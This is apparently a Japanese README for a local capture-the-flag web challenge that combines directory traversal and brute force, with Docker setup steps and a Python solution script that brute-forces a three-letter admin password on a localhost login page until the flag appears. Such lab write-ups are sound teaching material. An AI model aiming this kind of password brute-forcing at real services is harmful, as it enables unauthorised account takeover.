# Dockerでの動かし方
- Dockerfileがあるディレクトリで `docker build -t infosysnet .` と `docker run -it --rm -p 9999:80 infosysnet` を叩く。
- `http://localhost:9999/infosysnet/index/` にアクセスする。

# 問題
- `ディレクトリトラバーサル` と `ブルートフォース` を組み合わせた問題
- ksnctf の [Sherlock Holmes](http://ksnctf.sweetduet.info/problem/26) を簡単にした

# 解説 と exploit 
- ディレクトリトラバーサルの解説は [解説](https://gitlab.com/dilmnqvovpnmlib/ctf/issues/19) を参照

```python
import requests, sys

url = 'http://127.0.0.1:8000/infosysnet/index/index/'

payload = {
    'name': 'admin',
    'password': ''
}

for a in range(97, 123):
    for b in range(97, 123):
        for c in range(97, 123):
            flag = chr(a) + chr(b) + chr(c)
            payload['password'] = flag
            res = requests.post(url, data=payload)
            if 'FLAG' in res.text:
                print(res.text)
                sys.exit()

```